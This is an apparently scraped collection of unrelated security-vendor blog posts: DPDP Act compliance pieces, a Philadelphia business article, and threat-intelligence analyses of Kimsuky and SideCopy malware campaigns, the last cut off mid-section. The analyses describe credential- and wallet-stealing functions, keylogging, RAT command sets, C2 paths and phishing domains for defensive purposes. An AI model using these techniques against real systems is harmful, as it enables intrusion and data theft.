India’s retail sector is undergoing a significant digital transformation, with e-commerce, loyalty programs, and personalized marketing becoming the norm. This evolution means retailers are collecting and processing vast amounts of customer data, making compliance with the Digital Personal Data Protection (DPDP) Act 2023 a business necessity.
This blog explores why the DPDP Act is critical for the Indian retail ecosystem, highlighting its role in strengthening customer trust, enhancing data security, and ensuring responsible data management. By aligning with this legislation, retailers can meet regulatory requirements and differentiate themselves through stronger data governance and transparency.
Building Stronger Customer Relationships Through Trust
Customer trust is a critical business asset in today’s competitive retail landscape. The DPDP Act grants consumers (Data Principals) key rights over their data, including access, correction, and erasure under specific conditions. By aligning with the DPDP Act’s compliance framework, retailers can reinforce their commitment to data privacy and transparency, strengthening customer relationships.
These principles enhance brand credibility and foster long-term customer loyalty, positioning retailers as responsible data stewards in an evolving digital marketplace.
Ensuring Data Security in a Digital Marketplace
The retail sector faces growing cybersecurity risks, with data breaches potentially exposing sensitive customer information such as payment details and contact data. Under the DPDP Act, as Data Fiduciaries, retailers must implement robust security measures to prevent breaches and promptly notify the Data Protection Board of India and affected customers in case of an incident.
By prioritizing compliance-driven data security, retailers can mitigate cyber risks, protect customer information, and safeguard brand reputation, ensuring long-term business resilience in an increasingly digital landscape.
Promoting Fair and Transparent Data Practices
The DPDP Act enforces key principles like purpose limitation and data minimization. It requires retailers to collect only necessary data for defined purposes—such as processing transactions or personalizing offers—and retain it only as long as needed.
By adopting transparent data practices, retailers can ensure ethical data usage, reduce compliance risks, and enhance customer confidence. The Act also mandates clear customer notifications on data collection and usage, reinforcing trust and regulatory accountability in an increasingly data-driven retail landscape.
Ensuring Regulatory Compliance in a Growing Sector
The DPDP Act establishes a comprehensive legal framework for data protection, which is crucial for India’s rapidly expanding retail industry. Compliance ensures that retailers meet regulatory standards for processing digital personal data, mitigating risks of penalties and legal liabilities.
By aligning with the Act’s requirements, retailers can reinforce their commitment to ethical data practices, enhance customer trust, and operate with greater transparency and accountability in the evolving digital marketplace.
Empowering Consumers with Control Over their Data
The DPDP Act grants consumers the right to access, correct, and request the erasure of their digital personal data held by retailers. To ensure compliance, businesses must implement efficient mechanisms for handling these requests within the legal framework.
By prioritizing consumer data rights, retailers can enhance transparency, strengthen accountability, and foster trust, allowing customers to make informed decisions about the data they share—ultimately improving brand credibility and customer engagement.
Key Compliance Obligations for Retailers under the DPDP Act
Retailers must align with several critical obligations under the DPDP Act 2023 to ensure compliance and data protection:
Obtaining Informed Consent: Customer consent is required to process personal data, including marketing and loyalty programs.
Implementing Security Measures: Strong technical and organizational controls must safeguard customer data, such as secure access to corporate resources and endpoint protection.
Data Breach Notification: Any data breaches must be promptly reported to the Data Protection Board and affected customers.
Data Retention Policies: Clear policies must ensure customer data is retained only as long as necessary for its intended purpose.
Handling Data Principal Rights Requests: Efficient processes should be in place to manage customer requests for data access, correction, and erasure.
Potential Appointment of a Data Protection Officer (DPO): Large retailers classified as Significant Data Fiduciaries may be required to appoint a DPO for compliance oversight.
Navigating the Path to DPDP Compliance in Retail
Retailers must take a proactive approach to ensure compliance with the DPDP Act. This includes conducting a comprehensive assessment of current data processing practices and updating privacy policies to align with regulatory requirements.
Staff training on data privacy protocols and investing in data privacy management systems are essential. Additionally, retailers must establish clear procedures for obtaining and managing customer consent, ensuring compliance, transparency, and enhanced customer trust in the digital marketplace.
Building a Privacy-First Retail Ecosystem
The Digital Personal Data Protection Act 2023 is pivotal in strengthening data security and trust in India’s retail sector. The Act enhances customer relationships and industry integrity by enforcing responsible data handling, empowering consumers, and prioritizing privacy compliance.
Retailers who proactively adopt DPDP Act compliance fulfill legal requirements and gain a competitive edge by showcasing their commitment to customer data protection. Seqrite offers comprehensive data protection solutions to help retailers navigate compliance complexities and implement robust security frameworks. Contact us or visit our website for information.
Kimsuky: A Continuous Threat to South Korea with Deceptive Tactics
Contents
Introduction
Infection Chain
Initial Findings
Campaign 1
Looking into PDF document.
Campaign 2
Looking into PDF document.
Technical Analysis
Conclusion
Seqrite Protection
MITRE ATT&CK
IOCs
Introduction:
Security researchers at Seqrite Labs have recently uncovered two distinct campaigns carried out by the APT group “Kimsuky,” also known as “Black Banshee.” This group has been actively targeting South Korea using evolving tactics. In these campaigns, the threat actors delivered two South Korean government-themed documents as lures, specifically targeting government entities within South Korea.
In this blog, we will delve into the technical details of the campaigns uncovered during our analysis. We will examine the various stages of infection, starting with a phishing email containing an LNK (shortcut) file attachment. The LNK file was designed to drop an obfuscated VBA (Visual Basic for Applications) script, After de-obfuscating the script, we found that it was responsible for dropping two additional files: One Pdf file and One ZIP file The ZIP file contained four malicious files: two log files (1.log and 2.log), one VBA script (1.vba), and one PowerShell script (1.ps1). Both campaigns involved the same set of malicious files.
Infection Chain:
Fig .1 infection chain
Initial Findings:
Campaign-1:
In the first campaign, we identified a document related to tax reduction and tax payment related to revenue, which contained the same malicious LNK attachment. This attachment subsequently deployed a malicious VBScript, facilitating further compromise.
Fig .2 Revanue.pdf file
Based on our initial findings, we discovered that the adversary utilized a different document containing the same LNK file content.
Campaign-2:
In campaign-2, it has come to our attention that South Korea has enacted a new policy aimed at preventing recidivism among sex offenders. The initiative involves circulating a detailed document outlining the regulations, which was shared with households, daycare centers, kindergartens, and various local administrative offices, including township and village authorities, as well as neighbourhood community centres. However, hackers, including cyber-criminals, are exploiting this dissemination process by sending deceptive emails containing harmful attachments. These emails are targeting residential recipients and key personnel at local offices.
Fig .3 Sex Offender Personal Information Notification.pdf
The adversaries have exploited the distribution of this information and document by circulating it via email, disguised under the filename 성범죄자 신상정보 고지.pdf.lnk (Sex Offender Personal Information Notification.pdf.lnk). This attachment contains a malicious LNK file, which poses a cybersecurity threat to the recipients.
Technical Analysis and Methodology:
Campaign 1 & 2:
We have downloaded the file named 28f2fcece68822c38e72310c911ef007f8bd8fd711f2080844f666b7f371e9e1.lnk from campaign-1 and “성범죄자 신상정보 고지.pdf.lnk” from campaign-2 (Sex Offender Personal Information Notification.pdf.lnk) that was shared via email. During the analysis of this LNK file, it appears to be fetching additional files from an external C2 server, as shown in the snapshot below.
Fig.4 Downloading VBScript from C2 (Campaign –1)
Fig .5 Downloading VBScript From C2 (Campaign -2)
The file was downloaded from the URL provided above and saved into the Temp folder, as indicated below.
Fig .6 downloaded into Temp Folder (Campaign-1)
Fig .7 downloaded into Temp Folder (Campaign-2)
The file downloaded from the C2 server appears to be an obfuscated VBScript. Upon DE obfuscating the script, we discovered two additional files: one PDF and one ZIP file.
Fig .8 Obfuscated VB Script
The first section of the file is encoded in Base64 strings.
Fig .9 Base64 Encoded PDF
After Decoding we have found one PDF file.
Fig .10 PDF after Decoding
The second part of the VBScript is also encoded in Base64. After decoding it, we discovered a ZIP file.
Fig .11 Zip File
Fig. 12 Detect It Easy
Zip files contain the below numbers of files in it.
Fig .13 Inside Zip File
Within the ZIP archive, four files were identified: a VBScript, a PowerShell script, and two Base64-encoded text files. These encoded text files house obfuscated data, which, upon further dissection, may yield critical intelligence regarding the malware’s functionality and objectives. The following figures illustrate the encoded content of the two text files, which will be subsequently decoded and analysed to elucidate the next phase in the attack chain.
Fig. 14- 1 Log.txt file with Base64 encoding
Fig.15 – 2 Log .txt file with Base64 encoding
The 1.vbs file employs advanced obfuscation techniques, utilizing the chr() and CLng() functions to dynamically construct characters and invoke commands at runtime. This strategy effectively circumvents signature-based detection mechanisms, allowing the script to evade detection during execution.
Upon script termination, the concatenated characters form a complete command, which is subsequently executed. This command is likely designed to invoke the 1.ps1 PowerShell script, passing 1.log as an argument for further processing.
Fig .16 – 1.vbs
Upon attempting to DE-obfuscate the VBScript, we uncovered the following command-line execution, which subsequently triggers the PowerShell script for further processing.
Fig .17 De-Obfuscated VB Script
Upon executing the 1.vbs file, it triggered the invocation of the 1.ps1 file, as illustrated in the snapshot below.
Fig .18 Executing 1.VBS
The 1.ps1 script includes a function designed to decode Base64-encoded data from the 1.log file and execute the resulting script.
Fig.19 – 1.ps1 file
Fig.20 – 1 Log.txt after decoding
The 1.ps1 script retrieves the BIOS serial number, a unique system identifier, from the compromised host. This serial number is subsequently used to create a dedicated directory within the system’s temporary folder, ensuring that attack-related files are stored in a location specific to the compromised machine, as shown in above snapshot.
As a VM-aware sample, the script checks if it is executing within a virtual machine environment. If it detects a virtual machine, it will delete all four files associated with the attack (1.vbs, 1.ps1, 1.log, and any payload files stored in the directory named after the serial number), effectively halting its execution, as illustrated.
The script encompasses 11 functions that define the subsequent phases of the malware’s operation, which include data exfiltration, cryptocurrency wallet information theft, and the establishment of Command-and-Control (C2) communications. These functions are integral to the attack’s execution, facilitating the malware’s objectives and ensuring persistent communication with the threat actor.
List of malicious function retrieved from 1 log file:
UploadFile ():
The upload function exfiltrates data by transmitting it to the server in 1MB chunks, allowing it to handle large file sizes efficiently. The script awaits a response from the server, and if it receives an HTTP status code of “200,” it proceeds with further execution. If the response differs, the script terminates its operation. Each chunk is sent via an HTTP POST request, with the function verifying the success of each upload iteration before continuing.
Fig .21 UploadFile()
GetExWFile ():
The GetExWFile function iterates through a set of predefined hash tables containing cryptocurrency wallet extensions. When a match is found, it identifies the associated”.ldb” and ”.log” files linked to those extensions for exfiltration. These files are subsequently transferred to the specified destination folder, as indicated by the $Storepath variable.
Fig.22 GetExWFile ()
GetBrowserData ():
The script checks whether any of the following browsers—Edge, Firefox, Chrome, or Naver Whale—are actively running, to extract user profile data, including cookies, login credentials, bookmarks, and web data. Prior to collecting this information, the script terminates the browser processes to ensure uninterrupted access. It then proceeds to retrieve data on installed extensions and cache files, such as webcacheV01.dat, for each identified browser. For certain browsers, it also performs decryption operations to unlock encrypted keys, allowing it to extract sensitive information, which is then stored alongside the decrypted master encryption key.
Fig.23 BrowserData ()
Download file () :
The download file function downloads any file based on the C2 command.
Fig.24 Download File ()
RegisterTask () :
It creates persistence for the files “1.log” and “1.vbs”.
Fig.25 RegisterTask()
Send ():
The send () function uploads all the collected information to the server after compressing the data into a ZIP file named “init.zip”. It then renames the ZIP file to “init.dat” and deletes all backup files from the system after uploading.
Fig.26 Send ()
The execution flow of the functions follows a sequence where several actions are carried out within the attack. Among these functions, one triggers another PowerShell command that calls the 2.log file, which is responsible for performing keylogging activities.
Fig. 27 Flow of execution of functions and command to execute “2.log”.Fig.28 Executing 2 log file
Fig.29 Inside 2 log file
The decoded content of the 2.log file is shown above. It contains a script that imports essential Windows API functions for detecting key presses, retrieving window titles, and managing keyboard states. The script executes actions such as clipboard monitoring, keystroke logging, and recording window titles.
Fig. 30.2 Code for clipboard monitoring.
Conclusion
As observed, threat actors are utilizing time-consuming, multi-component techniques that are interlinked to enhance their evasiveness. Unlike other stealers, this one primarily focuses on network-related information, which could be leveraged for active reconnaissance. Given that the stealer targets sensitive user data, it is crucial to protect yourself with a reputable security solution such as Seqrite Antivirus in today’s digital landscape. At Seqrite Lab, we provide detection capabilities for such stealers at various stages of infection, along with protection against the latest threats.
Seqrite Protection:
Trojan.49424.SL
Trojan.49422.C
MITRE ATT&CK:
Initial Access
T1566.001
Phishing: Spearphishing Attachment
Execution
T1059.001
T1059.005
Command and Scripting Interpreter: PowerShell
Command and Scripting Interpreter: Visual Basic
Persistence
T1547.001
Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
Defense Evasion
T1140
Deobfuscate/Decode Files or Information
Credential Access
T1555.003
Credentials from Password Stores: Credentials from Web Browsers
Starting a thriving business in Philly is a way to bring your dreams into reality, whether you’ve always wanted to own a fashion line or provide products that are in demand in your own community. If you’re thinking of building a business in Philly, there are a few tips and tricks to keep close to you every step of the way. The more familiar you are with Philadelphia, its growth, and its evolution, the easier it’ll be for you to set up a shop with the best chances of success.
Choosing the Right Location
According to Enviro USA, Denmark is currently ranked as the cleanest country in the entire world. Any time your dreams consist of opening a thriving company in Philadelphia, you’ll want to take some time to research cleanliness factors, crime rates, and even the number of successful businesses that already exist in areas you consider to be prime real estate. Selecting the right location can mean the difference between having the ability to promote your goods and remaining off the radar of the locals in your community.
Minimize the Risk of Crime
In 2019, residents of Pennsylvania reported more than 39,228 cases of violent crimes, according to the direct FBI Uniform Crime Reporting Program unit. Unfortunately, there are many different cities and boroughs that are not considered safe in Philly today, especially when it comes to setting up shops or launching businesses.
But, with the advent of online search engines and live reports of crimes and incidents, it’s now easier than ever to keep an eye on the busiest, cleanest, and safest areas in Philly right from home or even with the use of your smartphone. You can use live updates, published crime statistics, and even input from nearby business owners to determine locations that are ideal for the type of business you’re interested in opening in Philly.
Set Your Business and Brand Apart
You will need to consider how you will be setting your brand apart when you’re operating in Philly, even if you do so online. Creating a designated brand that is unlike any other will help others remember you. Use unique logos and slogans to help others remember your brand name. Consider hosting contests and/or giveaways that will attract attention to your business while also helping you spread the word as you boost sales and the notoriety your business has around Philly at the time.
Create an Online Presence
Connecting to the internet without lag time while gaining access to networks and websites much faster is possible with the use of 5G. Having the internet is one of the best ways to set your business apart, whether you’re offering to fix electronics, repair them, or if you have clothing to sell. The more connected you are to the internet, the easier it will be for you to maximize your reach while spreading the image of your brand. An online presence can include a traditional website, social media page, newsletters, and even a live stream page to promote your products, services, and even items you intend to give away.
The more immersed and engaged you become in Philly, the easier it’ll be for you to build a thriving business of your own, regardless of your preferred and/or designated industry. From selling comic books and retail shirts to offering unique one-of-a-kind street foods, there are many different avenues to consider when you’re looking to build a thriving business in Philly today. The right vision and an understanding of Philly’s culture will go a long way once you make the leap into the world of entrepreneurship. Best of luck in your journey!
The Digital Personal Data Protection (DPDP) Act 2023 marks a pivotal shift in India’s data protection framework, setting clear guidelines for managing personal data. For the Banking, Financial Services, and Insurance (BFSI) sectors, which process vast volumes of sensitive customer information, this legislation is not just another compliance requirement but a strategic imperative.
The DPDP Act 2023 strengthens data security, fosters customer trust, and enhances regulatory alignment, making it a cornerstone for a resilient and customer-centric BFSI ecosystem. This blog delves into the critical reasons why this legislation is essential for the sector.
Building Customer Trust and Confidence
In the BFSI sector, trust is the foundation of strong customer relationships. The DPDP Act 2023 enhances this trust by empowering individuals (Data Principals) with greater control over their personal data, including rights to access, rectify, and request erasure under specific conditions. By aligning with the DPDP Act’s principles, BFSI organizations can reinforce their commitment to data privacy and security, strengthening customer confidence.
This proactive approach safeguards compliance and becomes a competitive differentiator in an era where data protection is a key driver of customer loyalty and business growth.
Enhanced Regulatory Compliance
The BFSI sector in India operates within a highly regulated ecosystem, overseen by authorities such as the Reserve Bank of India (RBI), the Securities and Exchange Board of India (SEBI), and the Insurance Regulatory and Development Authority of India (IRDAI). The DPDP Act 2023 complements these existing regulations by establishing a unified data protection framework for the sector.
Ensuring compliance with the DPDP Act helps BFSI organizations meet their legal obligations regarding handling digital personal data. It also mitigates the risks of regulatory penalties and legal repercussions, reinforcing operational resilience and trust.
Strengthening Data Security
Due to the highly sensitive financial and personal data it handles, the BFSI sector remains a prime target for cyberattacks and data breaches. The DPDP Act 2023 reinforces security by requiring Data Fiduciaries (entities processing personal data) to implement robust safeguards to prevent breaches and mandating timely notifications to the Data Protection Board of India and affected individuals in case of an incident.
By adhering to these stringent security requirements, BFSI institutions can enhance cybersecurity resilience, mitigate risks, and safeguard customer trust and brand reputation in an increasingly threat-prone digital landscape.
Promoting Responsible Data Handling
The DPDP Act 2023 enforces key data protection principles, including purpose, data minimization, and storage limitations. For the BFSI sector, this translates to collecting only essential data for defined purposes, retaining it for the necessary duration, and ensuring its accuracy and integrity.
By adopting these responsible data management practices, BFSI organizations can mitigate risks associated with data misuse, strengthen regulatory compliance, and reinforce customer trust. It ensures that personal information is handled with the highest standards of security and diligence.
Enabling Innovation with Safeguards
While prioritizing data protection, the DPDP Act 2023 also acknowledges the need for lawful data processing to drive innovation and service excellence. For the BFSI sector, this enables firms to leverage data for customer insights, risk assessment, and hyper-personalization within a consent-driven framework, ensuring transparency and accountability.
The Act provides a clear legal foundation for responsible data utilization, empowering BFSI organizations to enhance customer experience, optimize decision-making, and accelerate business growth while maintaining regulatory compliance.
Key Aspects of the DPDP Act Relevant to BFSI
Several key provisions of the DPDP Act 2023 are particularly critical for the BFSI sector:
Consent Requirements: BFSI firms must obtain explicit and informed consent from customers before processing personal data, with limited exceptions for legitimate purposes.
Data Security Obligations: Implementing robust technical and organizational safeguards to protect personal data is mandatory.
Data Breach Notification: Firms must promptly report breaches to the Data Protection Board and affected customers to ensure transparency and accountability.
Data Retention Policies: BFSI entities must establish clear retention policies, ensuring data is stored only for as long as necessary for its intended purpose.
Rights of Data Principals: Organizations must enable customers to access, correct, and request erasure of their personal data through well-defined mechanisms.
Obligations of Significant Data Fiduciaries: Given the high volume and sensitivity of data handled, many BFSI firms will be classified as Significant Data Fiduciaries, requiring additional compliance measures such as appointing a Data Protection Officer (DPO) and conducting Data Protection Impact Assessments (DPIAs).
Challenges and Opportunities
Implementing the DPDP Act 2023 presents challenges for the BFSI sector, including adapting existing data processing systems, training employees on compliance requirements, and streamlining consent management. However, these challenges also serve as strategic opportunities to enhance data governance frameworks, fortify cybersecurity measures, and foster greater transparency with customers.
By proactively addressing these aspects, BFSI organizations can ensure compliance, strengthen trust, improve operational resilience, and drive long-term business growth in an evolving regulatory landscape.
Conclusion
The Digital Personal Data Protection (DPDP) Act 2023 is a landmark regulation with far-reaching implications for the BFSI sector in India. The Act fosters a more secure and trustworthy digital financial ecosystem by strengthening data protection, empowering individuals, and enforcing stringent data handling standards. Proactive compliance is not just a legal requirement but a strategic necessity for BFSI institutions to build customer trust, enhance brand reputation, and stay competitive in an evolving digital landscape.
Seqrite offers a comprehensive suite of data protection solutions to help BFSI organizations navigate the complexities of the DPDP Act and ensure robust compliance.
Seqrite Labs APT team has uncovered new tactics of Pakistan-linked SideCopy APT deployed since the last week of December 2024. The group has expanded its scope of targeting beyond Indian government, defence, maritime sectors, and university students to now include entities under railway, oil & gas, and external affairs ministries. One notable shift in recent campaigns is the transition from using HTML Application (HTA) files to adopting Microsoft Installer (MSI) packages as a primary staging mechanism.
Threat actors are continuously evolving their tactics to evade detection, and this shift is driven by their persistent use of DLL side-loading and multi-platform intrusions. This evolution also incorporates techniques such as reflective loading and repurposing open-source tools such as Xeno RAT and Spark RAT, following its trend with Async RAT to extend its capabilities. Additionally, a new payload dubbed CurlBack RAT has been identified that registers the victim with the C2 server.
Key Findings
Usernames associated with attacker email IDs are impersonating a government personnel member with cyber security background, utilizing compromised IDs.
A fake domain mimicking an e-governance service, with an open directory, is used to host payloads and credential phishing login pages.
Thirteen sub-domains and URLs host login pages for various RTS Services for multiple City Municipal Corporations (CMCs), all in the state of Maharashtra.
The official domain of National Hydrology Project (NHP), under the Ministry of Water Resources, has been compromised to deliver malicious payloads.
New tactics such as reflective loading and AES decryption of resource section via PowerShell to deploy a custom version of C#-based open-source tool XenoRAT.
A modified variant of Golang-based open-source tool SparkRAT, is targeting Linux platforms, has been deployed via the same stager previously used for Poseidon and Ares RAT payloads.
A new RAT dubbed CurlBack utilizing DLL side-loading technique is used. It registers the victim with C2 server via UUID and supports file transfer using curl.
Honey-trap themed campaigns were observed in January 2025 and June 2024, coinciding with the arrest of a government employee accused of leaking sensitive data to a Pakistani handler.
A previously compromised education portal seen in Aug 2024, became active again in February 2025 with new URLs targeting university students. These employ three different themes: “Climate Change”, “Research Work”, and “Professional” (Complete analysis can be viewed in the recording here, explaining six different clusters of SideCopy APT).
The parent group of SideCopy, APT36, has targeted Afghanistan after a long with a theme related to Office of the Prisoners Administration (OPA) under Islamic Emirate of Afghanistan. A recent campaign targeting Linux systems with the theme “Developing Leadership for Future Wars” involves AES/RC4 encrypted stagers to drop MeshAgent RMM tool.
Targeted sectors under the Indian Ministry
Railways
Oil & Gas
External Affairs
Defence
Phishing Emails
The campaign targeting the Defence sector beings with a phishing email dated 13 January 2025, with the subject “Update schedule for NDC 65 as discussed”. The email contains a link to download a file named “NDC65-Updated-Schedule.pdf” to lure the target.
Fig. 1 – NDC Phishing Email (1)
A second phishing email sent on 15 January 2025 with the subject “Policy update for this course.txt”, also contains a phishing link. This email originates from an official-looking email ID which is likely compromised. National Defence College (NDC) is a defence service training institute for strategic and practice of National Security located in Delhi, operates under the Ministry of Defence, India.
Fig. 2 – NDC Phishing Email (2)
The attacker’s email address “gsosystems-ndc@outlook[.]com”, was created on 10 January 2025 in UAE and was last seen active on 28 February 2025. OSINT reveals similar looking email ID “gsosystems.ndc-mod@nic[.]in” belonging to National Informatics Centre (NIC), a department under the Ministry of Electronics and Information Technology (MeitY), India. The username linked to the attacker’s email impersonates a government personnel member with cyber security background.
Fig. 3 – Attacker Email
Decoy Documents
The decoy is related to the National Defence College (NDC) in India and contains the Annual Training Calendar (Study & Activities) for the year 2025 for the 65th Course (NDC-65). Located in New Delhi, it is the defence service training institute and highest seat of strategic learning for officers of the Defence Service (Indian Armed Forces) and the Civil Services, all operating under the Ministry of Defence, India.
Fig. 4 – NDC Calendar Decoy [Defence]
Another phishing archive file observed with name “2024-National-Holidays-RH-PER_N-1.zip”, comes in two different variants targeting either Windows or Linux systems. Once the payload is triggered, it leads to a decoy document that contains a list of holidays for the Open Line staff for the year 2024 as the name suggests. This is an official notice from Southern Railway dated 19 December 2023, specifically for the Chennai Division. Southern Railway (SR) is one of the eighteen zones of Indian Railways, a state-owned undertaking of the Ministry of Railways, India.
Fig. 5 – Holiday List Decoy [Railways]
The third infection chain includes a document titled “Cybersecurity Guidelines” for the year 2024, which appears to be issued by Hindustan Petroleum Corporation Limited (HPCL). Headquarted in Mumbai, HPCL is a public sector undertaking in petroleum and natural gas industry and is a subsidiary of the Oil and Natural Gas Corporation (ONGC), a state-owned undertaking of the Ministry of Petroleum and Natural Gas, India.
Another document linked to the same infection is the “Pharmaceutical Product Catalogue” for 2025, issued by MAPRA. It is specifically intended for employees of the Ministry of External Affairs (MEA), in India. Mapra Laboratories Pvt. Ltd. is a pharmaceutical company with headquarters in Mumbai.
Fig. 7 – Catalogue Decoy [External Affairs]
OpenDir and CredPhish
A fake domain impersonating the e-Governance portal services has been utilized to carry out the campaign targeting railway entities. This domain was created on 16 June 2023 and features an open directory hosting multiple files, identified during the investigation.
Fig. 8 – Open directory
A total of 13 sub-domains have been identified, which function as login portals for various systems such as:
Webmail
Safety Tank Management System
Payroll System
Set Authority
These are likely used for credential phishing, actively impersonating multiple legitimate government portals since last year. These login pages are typically associated with RTS Services (Right to Public Services Act) and cater to various City Municipal Corporations (CMC). All these fake portals belong to cities located within the state of Maharashtra:
Chandrapur
Gadchiroli
Akola
Satara
Vasai Virar
Ballarpur
Mira Bhaindar
Fig. 9 – Login portals hosted on fake domain
The following table lists the identified sub-domains and the dates they were first observed:
Sub-domains
First Seen
gadchiroli.egovservice[.]in
2024-12-16
pen.egovservice[.]in
2024-11-27
cpcontacts.egovservice[.]in
cpanel.egovservice[.]in
webdisk.egovservice[.]in
cpcalendars.egovservice[.]in
webmail.egovservice[.]in
2024-01-03
dss.egovservice[.]in
cmc.egovservice[.]in
2023-11-03
mail.egovservice[.]in
2023-10-13
pakola.egovservice[.]in
pakora.egovservice[.]in
2023-07-23
egovservice[.]in
2023-06-16
All these domains have the following DNS history primarily registered under AS 140641 (YOTTA NETWORK SERVICES PRIVATE LIMITED). This indicates a possible coordinated infrastructure set up to impersonate legitimate services and collect credentials from unsuspecting users.
Fig. 10 – DNS history
Further investigation into the open directory revealed additional URLs associated with the fake domain. These URLs likely serve similar phishing purposes and host further decoy content.
hxxps://egovservice.in/vvcmcrts/
hxxps://egovservice.in/vvcmc_safety_tank/
hxxps://egovservice.in/testformonline/test_form
hxxps://egovservice.in/payroll_vvcmc/
hxxps://egovservice.in/pakora/egovservice.in/
hxxps://egovservice.in/dssrts/
hxxps://egovservice.in/cmc/
hxxps://egovservice.in/vvcmcrtsballarpur72/
hxxps://egovservice.in/dss/
hxxps://egovservice.in/130521/set_authority/
hxxps://egovservice.in/130521/13/
Cluster-A
The first cluster of SideCopy’s operations shows a sophisticated approach by simultaneously targeting both Windows and Linux environments. New remote access trojans (RATs) have been added to their arsenal, enhancing their capability to compromise diverse systems effectively.
Fig. 11 – Cluster A
Windows
A spear-phishing email link downloads an archive file, that contains double extension (.pdf.lnk) shortcut. They are hosted on domains that look to be legitimate:
The shortcut triggers cmd.exe with arguments that utilize escape characters (^) to evade detection and reduce readability. A new machine ID “dv-kevin” is seen with these files as we see “desktop-” prefix in its place usually.
Fig. 12 – Shortcuts with double extension
Utility msiexec.exe is used for installing the MSI packages that are hosted remotely. It uses quiet mode flag with the installation switch.
The first domain mimics a fake e-governance site seen with the open directory, while the second one is a compromised domain that belongs to the official National Hydrology Project, an entity under the Ministry of Water Resources. The MSI contains a .NET executable ConsoleApp1.exe which drops multiple PE files that are base64 encoded. Firstly, the decoy document is dropped in Public directory and opened, whereas remaining PE files are dropped in ‘C:\ProgramData\LavaSoft\’. Among them are two DLLs:
Legitimate DLL: Sampeose.dll
Malicious DLL: DUI70.dll, identified as CurlBack RAT.
Fig. 13 – Dropper within MSI package
CurlBack RAT
A signed Windows binary girbesre.exe with original name CameraSettingsUIHost.exe is dropped beside the DLLs. Upon execution, the EXE side-loads the malicious DLL. Persistence is achieved by dropping a HTA script (svnides.hta) that creates a Run registry key for the EXE. Two different malicious DLL samples were found, which have the compilation timestamps as 2024-12-24 and 2024-12-30.
Fig. 14 – Checking response ‘/antivmcommand’
CurlBack RAT initially checks the response of a specific URL with the command ‘/antivmcommand’. If the response is “on”, it proceeds, otherwise it terminates itself thereby maintaining a check. It gathers system information, and any connected USB devices using the registry key:
“SYSTEM\\ControlSet001\\Enum\\USBSTOR”
Fig. 15 – Retrieving system info and USB devices
Displays connected and running processes are enumerated to check for explorer, msedge, chrome, notepad, taskmgr, services, defender, and settings.
Fig. 16 – Enumerate displays and processes
Next, it generates a UUID for client registration with the C2 server. The ID generated is dumped at “C:\Users\<username>\.client_id.txt” along with the username.
Fig. 17 – Client ID generated for C2 registration
Before registering with the ID, persistence is set up via scheduled task with the name “OneDrive” for the legitimate binary, which can be observed at the location: “C:\Windows\System32\Tasks\OneDrive”.
Fig. 18 – Scheduled Task
Reversed strings appended to the C2 domain and their purpose:
String
Functionality
/retsiger/
Register client with the C2
/sdnammoc/
Fetch commands from C2
/taebtraeh/
Check connection with C2 regularly
/stluser/
Upload results to the C2
Once registered, the connection is kept alive to retrieve any commands that are returned in the response.
Fig. 19 – Commands response after registration
If the response contains any value, it retrieves the current timestamp and executes one of the following C2 commands:
Command
Functionality
info
Gather system information
download
Download files from the host
persistence
Modify persistence settings
run
Execute arbitrary commands
extract
Extract data from the system
permission
Check and elevate privileges
users
Enumerate user accounts
cmd
Execute command-line operations
Fig. 20 – Checking process privilege with ‘permission’ command
Other basic functions include fetching user and host details, extracting archive files, and creating tasks. Strings and code show that CURL within the malicious DLL is present to enumerate and transfer various file formats:
Image files: GIF, JPEG, JPG, SVG
Text files: TXT, HTML, PDF, XML
Fig. 21 – CURL protocols supported
Linux
In addition to its Windows-focused attacks, the first cluster of SideCopy also targets Linux environments. The malicious archive file shares the same name as its Windows counterpart, but with a modification date of 2024-12-20. This archive contains a Go-based ELF binary, reflecting a consistent cross-platform strategy. Upon analysis, the function flow of the stager has code similarity to the stagers associated with Poseidon and Ares RAT. These are linked to Transparent Tribe and SideCopy APTs respectively.
Fig. 22 – Golang Stager for Linux
Stager functionality:
Uses wget command to download a decoy from egovservice domain into the target directory /.local/share and open it (National-Holidays-RH-PER_N-1.pdf).
Download the final payload elf as /.local/share/xdg-open and execute.
Create a crontab ‘/dev/shm/mycron’ to maintain persistence through system reboot for the payload, under the current username.
The final payload delivered by the stager is Spark RAT, an open-source remote access trojan with cross-platform support for Windows, macOS, and Linux systems. Written in Golang and released on GitHub in 2022, the RAT is very popular with over 500 forks. Spark RAT uses WebSocket protocol and HTTP requests to communicate with the C2 server.
Fig. 23 – Custom Spark RAT ‘thunder’ connecting to C2
Features of Spark RAT include process management and termination, network traffic monitoring, file exploration and transfer, file editing and deletion, code highlighting, desktop monitoring, screenshot capture, OS information retrieval, and remote terminal access. Additionally, it supports power management functions like shutdown, reboot, log-off, sleep, hibernate and lock screen functions.
Cluster-B
The second cluster of SideCopy’s activities targets Windows systems, although we suspect that it is targeting Linux systems based on their infrastructure observed since 2023.
Fig. 24 – Cluster B
The infection starts with a spear-phishing email link, that downloads an archive file named ‘NDC65-Updated-Schedule.zip’. This contains a shortcut file in double extension format which triggers a remote HTA file hosted on another compromised domain:
The machine ID associated with the LNK “desktop-ey8nc5b” has been observed in previous campaigns of SideCopy, although the modification date ‘2023:05:26’ suggests it may be an older one being reused. In parallel to the MSI stagers, the group continues to utilize HTA-based stagers which remain almost fully undetected (FUD).
Fig. 26 – Almost FUD stager of HTA
The HTA file contains a Base64 encoded .NET payload BroaderAspect.dll, which is decoded and loaded directly into the memory of MSHTA. This binary opens the dropped NDC decoy document in ProgramData directory and an addtional .NET stager as a PDF in the Public directory. Persistence is set via Run registry key with the name “Edgre” and executes as:
The dropped .NET binary named ‘Myapp.pdb’ has two resource files:
“Myapp.Resources.Document.pdf”
“Myapp.Properties.Resources.resources”
The first one is decoded using Caesar cipher with shift of 9 characters in backward direction. It is dropped as ‘Public\Downloads\Document.pdf’ (122.98 KB), which is a 2004 GIAC Paper on “Advanced communication techniques of remote access trojan horses on windows operating systems”.
Fig. 27– Document with appended payload
Though it is not a decoy, an encrypted payload is appended at the end. The malware searches for the “%%EOF” marker to separate PDF data from EXE data. The PDF data is extracted from the start to the marker, while the EXE Data is extracted after skipping 6 bytes beyond the marker.
Fig. 28 – Extracting EXE after EOF marker
After some delay, the EXE data is dropped as “Public\Downloads\suport.exe” (49.53 KB) which is sent as an argument along with a key to trigger a PowerShell command.
Fig. 29 – Extracting resource and triggering PowerShell
PowerShell Stage
